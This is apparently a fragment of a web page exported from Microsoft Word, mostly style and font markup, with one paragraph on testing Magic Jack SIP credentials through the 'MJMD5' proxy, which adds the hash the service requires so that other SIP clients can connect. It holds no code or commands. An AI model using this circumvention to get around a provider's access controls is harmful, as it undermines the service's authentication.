Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 159 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --></p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;">Testing settings and using other SIP Clients:</span></strong></p>
<p class="MsoNormal">Now that we have our SIP info, we want to test it to make sure we gathered all the correct information. To do this we will use the MJMD5 tool. This tool is a proxy server that we will send all our VOIP traffic through. This is needed since Magic Jack alters how the packets are sent by adding a hash to them. This tool will add the hash to the packet then send it.</p>
<p class="MsoNormal"><!--[if !mso]> <mce:style><!  v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} --> <!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;} @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 159 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} a:link, span.MsoHyperlink 	{mso-style-priority:99; 	color:blue; 	mso-themecolor:hyperlink; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{mso-style-noshow:yes; 	mso-style-priority:99; 	color:purple; 	mso-themecolor:followedhyperlink; 	text-decoration:underline; 	text-underline:single;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:48774980; 	mso-list-type:hybrid; 	mso-list-template-ids:719244718 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l1 	{mso-list-id:312415915; 	mso-list-type:hybrid; 	mso-list-template-ids:1646937762 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l1:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l2 	{mso-list-id:396637775; 	mso-list-type:hybrid; 	mso-list-template-ids:824324776 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l2:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l3 	{mso-list-id:711149702; 	mso-list-type:hybrid; 	mso-list-template-ids:2112007948 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l3:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l3:level2 	{mso-level-number-format:alpha-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l3:level3 	{mso-level-number-format:roman-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:right; 	text-indent:-9.0pt;} @list l4 	{mso-list-id:1554610790; 	mso-list-type:hybrid; 	mso-list-template-ids:-941836588 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l4:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l5 	{mso-list-id:1657491084; 	mso-list-type:hybrid; 	mso-list-template-ids:582891460 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l5:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l5:level2 	{mso-level-number-format:alpha-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l6 	{mso-list-id:1756784234; 	mso-list-type:hybrid; 	mso-list-template-ids:747005192 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l6:level1 	{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l6:level2 	{mso-level-number-format:alpha-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l7 	{mso-list-id:2006470365; 	mso-list-type:hybrid; 	mso-list-template-ids:1940574668 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l7:level1 	